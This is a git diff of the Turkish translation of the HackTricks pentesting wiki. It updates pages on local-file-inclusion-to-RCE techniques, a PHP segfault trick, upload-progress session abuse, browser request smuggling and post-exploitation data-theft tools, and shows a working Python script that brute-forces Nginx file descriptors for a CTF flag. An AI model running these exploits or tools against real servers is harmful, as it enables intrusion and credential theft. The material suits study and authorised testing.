/root path = "" component_num = random.randint(0, 10) for \_ in range(component_num): pid = random.choice(nginx_pids) if random.randint(0, 1) == 0: path += f"/proc/{pid}/cwd" else: path += f"/proc/{pid}/root" return path
-read_file(requests_session, nginx_pid, fd, nginx_pids) fonksiyonu, belirli bir Nginx PID'si ve dosya tanıtıcısı (fd) için istek gövdesi olarak payload gönderir ve yanıtı kontrol eder.
+def read_file(requests_session, nginx_pid, fd, nginx_pids): nginx_pid_list = list(nginx_pids) while True: path = generate_random_path_prefix(nginx_pid_list) path += f"/proc/{nginx_pid}/fd/{fd}" try: d = requests_session.get(SERVER + f"/?action=include&file={path}").text except: continue # Bayraklar hxp{} biçiminde biçimlendirilmiştir. if "hxp" in d: print("Bayrak bulundu! ") print(d)
-read_file_worker(requests_session, nginx_pid, nginx_pids) fonksiyonu, belirli bir Nginx PID'si için belirli dosya tanıtıcıları arasında dolaşarak payload gönderir ve yanıtı kontrol eder.
+def read_file_worker(requests_session, nginx_pid, nginx_pids): # Bir döngüde 10 - 45 arasında Nginx FD'leri tarama. Dosyalar ve soketler sürekli kapanırken - istek gövdesi FD'sinin bu aralıkta açılması çok yaygındır for fd in range(10, 45): thread = threading.Thread(target = read_file, args = (requests_session, nginx_pid, fd, nginx_pids)) thread.start()
-read_file_multiprocess(requests_session, nginx_pids) fonksiyonu, her bir Nginx PID'si için ayrı bir işlem oluşturarak dosya okuma işlemlerini çoklu işlemle gerçekleştirir.
+def read_file_multiprocess(requests_session, nginx_pids): for nginx_pid in nginx_pids: p = multiprocessing.Process(target=read_file_worker, args=(requests_session, nginx_pid, nginx_pids)) p.start()
-if __name__ == "__main__":
-print('\[DEBUG] Creating requests session')
-requests_session = create_requests_session()
-print('\[DEBUG] Getting Nginx pids')
-nginx_pids = get_nginx_pids(requests_session)
-print(f'\[DEBUG] Nginx pids: {nginx_pids}')
-print('\[DEBUG] Starting payload sending')
-send_payload_multiprocess(requests_session)
-print('\[DEBUG] Starting fd readers')
-read_file_multiprocess(requests_session, nginx_pids)
+if **name** == "**main**": print('\[DEBUG] İstekler oturumu oluşturuluyor') requests_session = create_requests_session() print('\[DEBUG] Nginx pid'leri alınıyor') nginx_pids = get_nginx_pids(requests_session) print(f'\[DEBUG] Nginx pid\'leri: {nginx_pids}') print('\[DEBUG] Payload göndermeye başlanıyor') send_payload_multiprocess(requests_session) print('\[DEBUG] fd okuyucuları başlatılıyor') read_file_multiprocess(requests_session, nginx_pids)
```
```
@@ -90,18 +81,19 @@ You can check their website and try their engine for **free** at:
+{% hint style="success" %}
+Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+Learn & practice GCP Hacking:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Support HackTricks
-Other ways to support HackTricks:
-
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+{% endhint %}
```
diff --git a/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md b/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
index c279121d0..f38073703 100644
--- a/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
+++ b/pentesting-web/file-inclusion/lfi2rce-via-segmentation-fault.md
@@ -1,20 +1,21 @@
# LFI2RCE via Segmentasyon Hatası
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
+HackTricks'i Destekleyin
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
-* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek paylaşın**.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+{% endhint %}
-[https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (ikinci bölüm) ve [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view) yazılarına göre, aşağıdaki payloadlar PHP'de bir segmentasyon hatasına neden olmuştur:
+Writeup'lara göre [https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/](https://spyclub.tech/2018/12/21/one-line-and-return-of-one-line-php-writeup/) (ikinci bölüm) ve [https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view](https://hackmd.io/@ZzDmROodQUynQsF9je3Q5Q/rJlfZva0m?type=view), aşağıdaki yükler PHP'de bir segmentasyon hatasına neden oldu:
```php
// PHP 7.0
include("php://filter/string.strip_tags/resource=/etc/passwd");
@@ -22,9 +23,9 @@ include("php://filter/string.strip_tags/resource=/etc/passwd");
// PHP 7.2
include("php://filter/convert.quoted-printable-encode/resource=data://,%bfAAAAAAAAAAAAAAAAAAAAAAA%ff%ff%ff%ff%ff%ff%ff%ffAAAAAAAAAAAAAAAAAAAAAAAA");
```
-Bilmelisiniz ki, bir **dosya içeren** bir **POST** isteği **gönderirseniz**, PHP bu dosyanın içeriğiyle birlikte `/tmp/php` dizininde geçici bir dosya oluşturur. Bu dosya istek işlendikten sonra **otomatik olarak silinir**.
+Eğer bir **POST** isteği **gönderirseniz** ve içinde bir **dosya bulunuyorsa**, PHP o dosyanın içeriğiyle birlikte `/tmp/php` dizininde geçici bir dosya oluşturacaktır. Bu dosya, istek işlendikten sonra **otomatik olarak silinecektir**.
-Bir **LFI** bulursanız ve PHP'de bir **segmentasyon hatası tetiklemeyi başarırsanız**, geçici dosya **asla silinmez**. Bu nedenle, LFI zafiyetiyle bu dosyayı bulabilir ve keyfi kodu çalıştırabilirsiniz.
+Bir **LFI** bulursanız ve PHP'de bir **segmentasyon hatası oluşturmayı başarırsanız**, geçici dosya **asla silinmeyecektir**. Bu nedenle, **LFI** zafiyeti ile o dosyayı bulabilir ve keyfi kodları çalıştırabilirsiniz.
Test için [https://hub.docker.com/r/easyengine/php7.0](https://hub.docker.com/r/easyengine/php7.0) docker imajını kullanabilirsiniz.
```python
@@ -69,16 +70,17 @@ bruteforce(charset)
if __name__ == "__main__":
main()
```
+{% hint style="success" %}
+AWS Hacking'ı öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'ı öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-Sıfırdan kahraman olmak için AWS hackleme öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
+HackTricks'i Destekleyin
-HackTricks'ı desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
-* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve **HackTricks Cloud** github depolarına katkıda bulunun.
+{% endhint %}
diff --git a/pentesting-web/file-inclusion/via-php_session_upload_progress.md b/pentesting-web/file-inclusion/via-php_session_upload_progress.md
index 716b6de11..0b2cca038 100644
--- a/pentesting-web/file-inclusion/via-php_session_upload_progress.md
+++ b/pentesting-web/file-inclusion/via-php_session_upload_progress.md
@@ -1,22 +1,23 @@
-# PHP\_SESSION\_UPLOAD\_PROGRESS ile LFI2RCE
+# LFI2RCE via PHP\_SESSION\_UPLOAD\_PROGRESS
+
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
-AWS hacklemeyi sıfırdan kahraman olmak için öğrenin htARTE (HackTricks AWS Red Team Expert)!
+HackTricks'i Destekleyin
-HackTricks'i desteklemenin diğer yolları:
-
-* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
-* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin**.
-* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin**.
+* **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek hacking püf noktalarını paylaşın.
+{% endhint %}
## Temel Bilgiler
-Eğer bir **Yerel Dosya Dahil Etme (LFI)** bulduysanız ve **bir oturumunuz yoksa** ve `session.auto_start` `Off` ise. Eğer **`session.upload_progress.enabled`** **`On`** ise ve **`PHP_SESSION_UPLOAD_PROGRESS`**'u **multipart POST** verilerinde sağlarsanız, PHP sizin için oturumu **etkinleştirecektir**.
+Eğer bir **Yerel Dosya Dahil Etme** bulduysanız ve **bir oturumunuz yoksa** ve `session.auto_start` `Off` ise bile. Eğer **`session.upload_progress.enabled`** **`On`** ise ve **`PHP_SESSION_UPLOAD_PROGRESS`**'i **multipart POST** verilerinde sağlarsanız, PHP **oturumu sizin için etkinleştirecektir**.
```bash
$ curl http://127.0.0.1/ -H 'Cookie: PHPSESSID=iamorange'
$ ls -a /var/lib/php/sessions/
@@ -30,33 +31,34 @@ $ ls -a /var/lib/php/sessions/
In the last example the session will contain the string blahblahblah
```
-**`PHP_SESSION_UPLOAD_PROGRESS`** ile oturum içindeki verileri kontrol edebilirsiniz, bu nedenle oturum dosyanızı dahil ederseniz kontrol ettiğiniz bir bölümü (örneğin bir php kabuk kodu) dahil edebilirsiniz.
+**`PHP_SESSION_UPLOAD_PROGRESS`** ile **oturum içindeki verileri kontrol edebilirsiniz**, bu nedenle oturum dosyanızı dahil ederseniz kontrol ettiğiniz bir bölümü dahil edebilirsiniz (örneğin bir php kabuk kodu).
{% hint style="info" %}
-İnternet'teki çoğu öğretici, hata ayıklama amacıyla `session.upload_progress.cleanup`'ı `Off` olarak ayarlamanızı önerir. Ancak PHP'nin varsayılan `session.upload_progress.cleanup` değeri hala `On` dur. Bu, oturumda yükleme ilerlemenizin mümkün olan en kısa sürede temizleneceği anlamına gelir. Bu yüzden bu bir **Yarış Koşulu** olacaktır.
+İnternet üzerindeki çoğu öğretici, hata ayıklama amacıyla `session.upload_progress.cleanup`'ı `Off` olarak ayarlamanızı önerse de, PHP'deki varsayılan `session.upload_progress.cleanup` hala `On` dur. Bu, oturumdaki yükleme ilerlemenizin mümkün olan en kısa sürede temizleneceği anlamına gelir. Bu nedenle bu bir **Yarış Koşulu** olacaktır.
{% endhint %}
### CTF
-Bu tekniğin yorumlandığı [**orijinal CTF**](https://blog.orange.tw/2018/10/) 'de, Yarış Koşulunu sömürmek yeterli değildi, yüklenen içeriğin ayrıca `@[**HackTricks Eğitim AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
-AWS hacklemeyi sıfırdan kahraman olmak için htARTE (HackTricks AWS Red Team Expert)'ı öğrenin!
+HackTricks'i Destekleyin
-HackTricks'i desteklemenin diğer yolları:
-
-* Şirketinizi HackTricks'te **reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
-* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin.**
-* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** paylaşın.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+{% endhint %}
diff --git a/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md b/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
index 5a45511fb..6511f40b2 100644
--- a/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
+++ b/pentesting-web/http-request-smuggling/browser-http-request-smuggling.md
@@ -1,31 +1,33 @@
-# Tarayıcı HTTP İstek Smugglingi
+# Tarayıcı HTTP İstek Karıştırma
+
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
-AWS hackleme konusunda sıfırdan kahramana dönüşmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ı öğrenin!
+HackTricks'i Destekleyin
-HackTricks'i desteklemenin diğer yolları:
-
-* Şirketinizi **HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
-* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
-* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+{% endhint %}
**Gönderiyi kontrol edin [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-AWS hackleme konusunda sıfırdan kahramana dönüşmek için htARTE (HackTricks AWS Kırmızı Takım Uzmanı)'ı öğrenin!
+HackTricks'i Destekleyin
-HackTricks'i desteklemenin diğer yolları:
-
-* Şirketinizi **HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
-* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı takip edin**
-* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
+* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
+{% endhint %}
diff --git a/post-exploitation.md b/post-exploitation.md
index 3013c83c6..103c9064a 100644
--- a/post-exploitation.md
+++ b/post-exploitation.md
@@ -1,27 +1,43 @@
+{% hint style="success" %}
+Öğren ve AWS Hacking pratiği yap:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+Öğren ve GCP Hacking pratiği yap:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
-AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin htARTE (HackTricks AWS Kırmızı Takım Uzmanı)!
+HackTricks'i Destekle
-HackTricks'ı desteklemenin diğer yolları:
-
-* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
-* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
-* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
-* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin**.
-* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
+* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
+{% endhint %}
-## **Yerel l00t**
+## **Yerel Ganimet**
-* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): Bu betikler, PE vektörlerini aramakla kalmayıp, dosya sistemi içinde hassas bilgileri de arayacak.
-* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne projesi**, yerel bir bilgisayarda depolanan birçok parolayı almak için kullanılan açık kaynaklı bir uygulamadır. Her yazılım, parolalarını farklı teknikler kullanarak (düz metin, API'ler, özel algoritmalar, veritabanları vb.) depolar. Bu araç, en yaygın olarak kullanılan yazılımların bu parolalarını bulmak amacıyla geliştirilmiştir.
+* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): Bu betikler, PE vektörlerini aramakla kalmayıp dosya sistemi içinde hassas bilgiler arayacak.
+* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne projesi**, yerel bir bilgisayarda depolanan birçok şifreyi almak için kullanılan açık kaynaklı bir uygulamadır. Her yazılım, şifrelerini farklı tekniklerle (açık metin, API'ler, özel algoritmalar, veritabanları vb.) depolar. Bu araç, en yaygın kullanılan yazılımlar için bu şifreleri bulmak amacıyla geliştirilmiştir.
## **Harici Hizmetler**
-* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): Bu Modül, bir erişim belirteci kullanarak Confluence'nin API'sine bağlanacak, PDF'ye dönüştürecek ve hedefin erişimi olan Confluence belgelerini indirecektir.
-* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Hedefinize (saldırgan olarak) erişiminiz olan bir hedefin Google Drive'ından dosyaları çıkarmak için Kırmızı Takım aracıdır. Bu, tüm paylaşılan dosyaları, paylaşılan sürücülerden tüm dosyaları ve hedefin erişimi olan alan sürücülerinden tüm dosyaları içerir.
-* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Hedef kuruluşun Google Kişi Dizini'ni, erişiminiz olan Google Kişi API'si aracılığıyla çıkarmak için Kırmızı Takım aracıdır.
-* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** Bu, bir erişim belirteci verildiğinde, yerel bir Slack çalışma alanından 'ilginç' bilgileri çıkarmak için yerleşik Slack API'lerini kullanan Python'da geliştirilmiş bir araçtır.
-* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound, bir Slack çalışma alanının/organizasyonunun keşfini hızlı bir şekilde yapmak için kırmızı ve mavi takımların kullanabileceği bir komut satırı aracıdır. Slackhound, bir organizasyonun kullanıcılarını, dosyalarını, mesajlarını vb. hızlı bir şekilde aranabilir hale getirir ve büyük nesneler çevrimdışı gözden geçirme için CSV'ye yazılır.
+* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): Bu Modül, hedefin erişimine sahip olduğunuz Confluence'nin API'sine bağlanacak, PDF'ye aktaracak ve Confluence belgelerini indirecektir.
+* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Kırmızı Takım aracı, hedefin Google Drive'ından (saldırganın erişimine sahip olduğu) dosyaları Google Drive API'si aracılığıyla dışa aktarmak için kullanılır. Bu, tüm paylaşılan dosyaları, paylaşılan sürücülerden tüm dosyaları ve hedefin erişimine sahip olduğu etki alanı sürücülerinden tüm dosyaları içerir.
+* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Kırmızı Takım aracı, erişiminiz olan hedef organizasyonunun Google Kişiler Dizinini Google'ın Kişiler API'si aracılığıyla dışa aktarmak için kullanılır.
+* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** Bu, bir erişim belirteci verildiğinde bir Slack çalışma alanından 'ilginç' bilgileri çıkarmak için yerel Slack API'lerini kullanan Python'da geliştirilmiş bir araçtır.
+* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound, bir Slack çalışma alanının/organizasyonunun hızlı bir şekilde keşfini yapmak için kırmızı ve mavi takımlar için bir komut satırı aracıdır. Slackhound, bir organizasyonun kullanıcılarını, dosyalarını, mesajlarını vb. hızlı bir şekilde aranabilir hale getirir ve büyük nesneler çevrimdışı inceleme için CSV'ye yazılır.
+
+{% hint style="success" %}
+Öğren ve AWS Hacking pratiği yap:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+Öğren ve GCP Hacking pratiği yap:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+HackTricks'i Destekle
+
+* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
+* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
+* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
+
+
+{% endhint %}
diff --git a/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md b/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md
index 76c3b5417..ee1a4af73 100644
--- a/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md
+++ b/reversing-and-exploiting/linux-exploiting-basic-esp/format-strings/format-strings-template.md
@@ -1,16 +1,17 @@
+{% hint style="success" %}
+AWS Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP Hacking'i öğrenin ve uygulayın:
[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
